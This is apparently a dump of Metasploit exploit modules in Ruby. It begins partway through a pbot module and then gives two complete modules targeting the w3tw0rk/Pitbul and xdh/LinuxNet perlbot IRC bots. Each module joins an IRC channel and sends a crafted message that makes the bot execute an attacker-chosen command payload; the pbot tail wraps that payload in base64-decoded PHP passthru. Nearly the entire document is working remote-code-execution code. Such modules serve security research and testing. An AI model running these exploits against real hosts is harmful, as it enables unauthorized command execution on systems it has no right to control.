 93 | 
 94 |   def send_msg(sock, data)
 95 |     sock.put(data)
 96 |     data = ""
 97 |     begin
 98 |       read_data = sock.get_once(-1, 1)
 99 |       while not read_data.nil?
100 |         data << read_data
101 |         read_data = sock.get_once(-1, 1)
102 |       end
103 |     rescue EOFError
104 |     end
105 |     data
106 |   end
107 | 
108 |   def register(sock)
109 |     msg = ""
110 | 
111 |     if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?
112 |       msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
113 |     end
114 | 
115 |     if datastore['NICK'].length > 9
116 |       nick = rand_text_alpha(9)
117 |       print_error("The nick is longer than 9 characters, using #{nick}")
118 |     else
119 |       nick = datastore['NICK']
120 |     end
121 | 
122 |     msg << "NICK #{nick}\r\n"
123 |     msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
124 | 
125 |     response = send_msg(sock,msg)
126 |     return response
127 |   end
128 | 
129 |   def join(sock)
130 |     join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
131 |     response = send_msg(sock, join_msg)
132 |     return response
133 |   end
134 | 
135 |   def pbot_login(sock)
136 |     login_msg = "PRIVMSG #{datastore['CHANNEL']} :.login"
137 |     if datastore['PBOT_PASSWORD'] and not datastore['PBOT_PASSWORD'].empty?
138 |       login_msg << " #{datastore['PBOT_PASSWORD']}"
139 |     end
140 |     login_msg << "\r\n"
141 |     response = send_msg(sock, login_msg)
142 |     return response
143 |   end
144 | 
145 |   def pbot_command(sock)
146 |     encoded = Rex::Text.encode_base64(payload.encoded)
147 |     command_msg = "PRIVMSG #{datastore['CHANNEL']} :.php #{rand_text_alpha(1)} passthru(base64_decode(\"#{encoded}\"));\r\n"
148 |     response = send_msg(sock, command_msg)
149 |     return response
150 |   end
151 | 
152 |   def quit(sock)
153 |     quit_msg = "QUIT :bye bye\r\n"
154 |     sock.put(quit_msg)
155 |   end
156 | 
157 |   def exploit
158 |     connect
159 | 
160 |     print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
161 |     response = register(sock)
162 |     if response =~ /463/ or response =~ /464/
163 |       print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
164 |       return
165 |     end
166 | 
167 |     print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
168 |     response = join(sock)
169 |     if not response =~ /353/ and not response =~ /366/
170 |       print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
171 |       return
172 |     end
173 | 
174 |     print_status("#{rhost}:#{rport} - Registering with the pbot...")
175 |     response = pbot_login(sock)
176 |     if not response =~ /auth/ or not response =~ /logged in/
177 |       print_error("#{rhost}:#{rport} - Error registering with the pbot")
178 |       return
179 |     end
180 | 
181 |     print_status("#{rhost}:#{rport} - Exploiting the pbot...")
182 |     pbot_command(sock)
183 | 
184 |     quit(sock)
185 |     disconnect
186 |   end
187 | end
188 | 


--------------------------------------------------------------------------------
/w3tw0rk_exec.rb:
--------------------------------------------------------------------------------
  1 | ##
  2 | # This module requires Metasploit: http://metasploit.com/download
  3 | # Current source: https://github.com/rapid7/metasploit-framework
  4 | ##
  5 | 
  6 | require 'msf/core'
  7 | 
  8 | 
  9 | class MetasploitModule < Msf::Exploit::Remote
 10 |   Rank = ExcellentRanking
 11 | 
 12 |   include Msf::Exploit::Remote::Tcp
 13 | 
 14 |   def initialize(info = {})
 15 |     super(update_info(info,
 16 |       'Name'           => 'w3tw0rk / Pitbul IRC Bot  Remote Code Execution',
 17 |       'Description'    => %q{
 18 |           This module allows remote command execution on the w3tw0rk / Pitbul IRC Bot.
 19 |         },
 20 |       'Author'         =>
 21 |         [
 22 |           'Jay Turla'
 23 |         ],
 24 |       'License'        => MSF_LICENSE,
 25 |       'References'     =>
 26 |         [
 27 |           [ 'OSVDB', '120384' ],
 28 |           [ 'EDB', '36652' ]
 29 |         ],
 30 |       'Platform'       => %w{ unix win },
 31 |       'Arch'           => ARCH_CMD,
 32 |       'Payload'        =>
 33 |         {
 34 |           'Space'    => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
 35 |           'DisableNops' => true,
 36 |           'Compat'      =>
 37 |             {
 38 |               'PayloadType' => 'cmd',
 39 |             }
 40 |         },
 41 |       'Targets'  =>
 42 |         [
 43 |           [ 'w3tw0rk', { } ]
 44 |         ],
 45 |       'Privileged'     => false,
 46 |       'DisclosureDate' => 'Jun 04 2015',
 47 |       'DefaultTarget'  => 0))
 48 | 
 49 |     register_options(
 50 |       [
 51 |         Opt::RPORT(6667),
 52 |         OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
 53 |         OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
 54 |         OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
 55 |       ], self.class)
 56 |   end
 57 | 
 58 |   def check
 59 |     connect
 60 | 
 61 |     response = register(sock)
 62 |     if response =~ /463/ or response =~ /464/
 63 |       vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
 64 |       return Exploit::CheckCode::Unknown
 65 |     end
 66 | 
 67 |     response = join(sock)
 68 |     if not response =~ /353/ and not response =~ /366/
 69 |       vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
 70 |       return Exploit::CheckCode::Unknown
 71 |     end
 72 | 
 73 |     quit(sock)
 74 |     disconnect
 75 | 
 76 |     if response =~ /auth/ and response =~ /logged in/
 77 |       return Exploit::CheckCode::Vulnerable
 78 |     else
 79 |       return Exploit::CheckCode::Safe
 80 |     end
 81 |   end
 82 | 
 83 |   def send_msg(sock, data)
 84 |     sock.put(data)
 85 |     data = ""
 86 |     begin
 87 |       read_data = sock.get_once(-1, 1)
 88 |       while not read_data.nil?
 89 |         data << read_data
 90 |         read_data = sock.get_once(-1, 1)
 91 |       end
 92 |     rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
 93 |       elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
 94 |     end
 95 | 
 96 |     data
 97 |   end
 98 | 
 99 |   def register(sock)
100 |     msg = ""
101 | 
102 |     if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?
103 |       msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
104 |     end
105 | 
106 |     if datastore['NICK'].length > 9
107 |       nick = rand_text_alpha(9)
108 |       print_error("The nick is longer than 9 characters, using #{nick}")
109 |     else
110 |       nick = datastore['NICK']
111 |     end
112 | 
113 |     msg << "NICK #{nick}\r\n"
114 |     msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
115 | 
116 |     response = send_msg(sock,msg)
117 |     return response
118 |   end
119 | 
120 |   def join(sock)
121 |     join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
122 |     response = send_msg(sock, join_msg)
123 |     return response
124 |   end
125 | 
126 |   def w3tw0rk_command(sock)
127 |     encoded = payload.encoded
128 |     command_msg = "PRIVMSG #{datastore['CHANNEL']} :!bot #{encoded}\r\n"
129 |     response = send_msg(sock, command_msg)
130 |     return response
131 |   end
132 | 
133 |   def quit(sock)
134 |     quit_msg = "QUIT :bye bye\r\n"
135 |     sock.put(quit_msg)
136 |   end
137 | 
138 |   def exploit
139 |     connect
140 | 
141 |     print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
142 |     response = register(sock)
143 |     if response =~ /463/ or response =~ /464/
144 |       print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
145 |       return
146 |     end
147 | 
148 |     print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
149 |     response = join(sock)
150 |     if not response =~ /353/ and not response =~ /366/
151 |       print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
152 |       return
153 |     end
154 | 
155 |     print_status("#{rhost}:#{rport} - Exploiting the IRC bot...")
156 |     w3tw0rk_command(sock)
157 | 
158 |     quit(sock)
159 |     disconnect
160 |   end
161 | end
162 | 


--------------------------------------------------------------------------------
/xdh_x_exec.rb:
--------------------------------------------------------------------------------
  1 | ##
  2 | # This module requires Metasploit: http://metasploit.com/download
  3 | # Current source: https://github.com/rapid7/metasploit-framework
  4 | ##
  5 | 
  6 | require 'msf/core'
  7 | 
  8 | class MetasploitModule < Msf::Exploit::Remote
  9 | 
 10 |   Rank = ExcellentRanking
 11 | 
 12 |   include Msf::Exploit::Remote::Tcp
 13 | 
 14 |   def initialize(info = {})
 15 |     super(update_info(info,
 16 |       'Name'           => 'Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution',
 17 |       'Description'    => %q{
 18 |           This module allows remote command execution on an IRC Bot developed by xdh.
 19 |           This perl bot was caught by Conor Patrick with his shellshock honeypot server
 20 |           and is categorized by Markus Zanke as an fBot (Fire & Forget - DDoS Bot). Matt
 21 |           Thayer also found this script which has a description of LinuxNet perlbot.
 22 | 
 23 |           The bot answers only based on the servername and nickname in the IRC message
 24 |           which is configured on the perl script thus you need to be an operator on the IRC
 25 |           network to spoof it and in order to exploit this bot or have at least the same ip
 26 |           to the config.
 27 |         },
 28 |       'Author'         =>
 29 |         [
 30 |           #MalwareMustDie
 31 |           'Jay Turla', # msf
 32 |           'Conor Patrick', # initial discovery and botnet analysis for xdh
 33 |           'Matt Thayer' # initial discovery for LinuxNet perlbot
 34 |         ],
 35 |       'License'        => MSF_LICENSE,
 36 |       'References'     =>
 37 |         [
 38 |           [ 'URL', 'https://conorpp.com/blog/a-close-look-at-an-operating-botnet/' ],
 39 |           [ 'URL', 'https://twitter.com/MrMookie/status/673389285676965889' ], # Matt's discovery
 40 |           [ 'URL', 'https://www.alienvault.com/open-threat-exchange/blog/elasticzombie-botnet-exploiting-elasticsearch-vulnerabilities' ] # details of what an fBot is
 41 |         ],
 42 |       'Platform'       => %w{ unix win },
 43 |       'Arch'           => ARCH_CMD,
 44 |       'Payload'        =>
 45 |         {
 46 |           'Space'    => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
 47 |           'DisableNops' => true,
 48 |           'Compat'      =>
 49 |             {
 50 |               'PayloadType' => 'cmd'
 51 |             }
 52 |         },
 53 |       'Targets'  =>
 54 |         [
 55 |           [ 'xdh Botnet / LinuxNet perlbot', { } ]
 56 |         ],
 57 |       'Privileged'     => false,
 58 |       'DisclosureDate' => 'Dec 04 2015',
 59 |       'DefaultTarget'  => 0))
 60 | 
 61 |     register_options(
 62 |       [
 63 |         Opt::RPORT(6667),
 64 |         OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
 65 |         OptString.new('NICK', [true, 'IRC Nickname', 'msfuser']), # botnet administrator name
 66 |         OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
 67 |       ], self.class)
 68 |   end
 69 | 
 70 |   def check
 71 |     connect
 72 | 
 73 |     res = register(sock)
 74 |     if res =~ /463/ || res =~ /464/
 75 |       vprint_error("#{rhost}:#{rport}  - Connection to the IRC Server not allowed")
 76 |       return Exploit::CheckCode::Unknown
 77 |     end
 78 | 
 79 |     res = join(sock)
 80 |     if !res =~ /353/ && !res =~ /366/
 81 |       vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
 82 |       return Exploit::CheckCode::Unknown
 83 |     end
 84 | 
 85 |     quit(sock)
 86 |     disconnect
 87 | 
 88 |     if res =~ /auth/ && res =~ /logged in/
 89 |       Exploit::CheckCode::Vulnerable
 90 |     else
 91 |       Exploit::CheckCode::Safe
 92 |     end
 93 |   end
 94 | 
 95 |   def send_msg(sock, data)
 96 |     sock.put(data)
 97 |     data = ""
 98 |     begin
 99 |       read_data = sock.get_once(-1, 1)
100 |       while !read_data.nil?
101 |         data << read_data
102 |         read_data = sock.get_once(-1, 1)
103 |       end
104 |     rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
105 |       elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
106 |     end
107 | 
108 |     data
109 |   end
110 | 
111 |   def register(sock)
112 |     msg = ""
113 | 
114 |     if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
115 |       msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
116 |     end
117 | 
118 |     if datastore['NICK'].length > 9
119 |       nick = rand_text_alpha(9)
120 |       print_error("The nick is longer than 9 characters, using #{nick}")
121 |     else
122 |       nick = datastore['NICK']
123 |     end
124 | 
125 |     msg << "NICK #{nick}\r\n"
126 |     msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
127 | 
128 |     send_msg(sock,msg)
129 |   end
130 | 
131 |   def join(sock)
132 |     join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
133 |     send_msg(sock, join_msg)
134 |   end
135 | 
136 |   def xdh_command(sock)
137 |     encoded = payload.encoded
138 |     command_msg = "PRIVMSG #{datastore['CHANNEL']} :.say #{encoded}\r\n"
139 |     send_msg(sock, command_msg)
140 |   end
141 | 
142 |   def quit(sock)
143 |     quit_msg = "QUIT :bye bye\r\n"
144 |     sock.put(quit_msg)
145 |   end
146 | 
147 |   def exploit
148 |     connect
149 | 
150 |     print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
151 |     res = register(sock)
152 |     if res =~ /463/ || res =~ /464/
153 |       print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
154 |       return
155 |     end
156 | 
157 |     print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
158 |     res = join(sock)
159 |     if !res =~ /353/ && !res =~ /366/
160 |       print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
161 |       return
162 |     end
163 | 
164 |     print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")
165 |     xdh_command(sock)
166 | 
167 |     quit(sock)
168 |     disconnect
169 |   end
170 | 
171 | end
172 | 


--------------------------------------------------------------------------------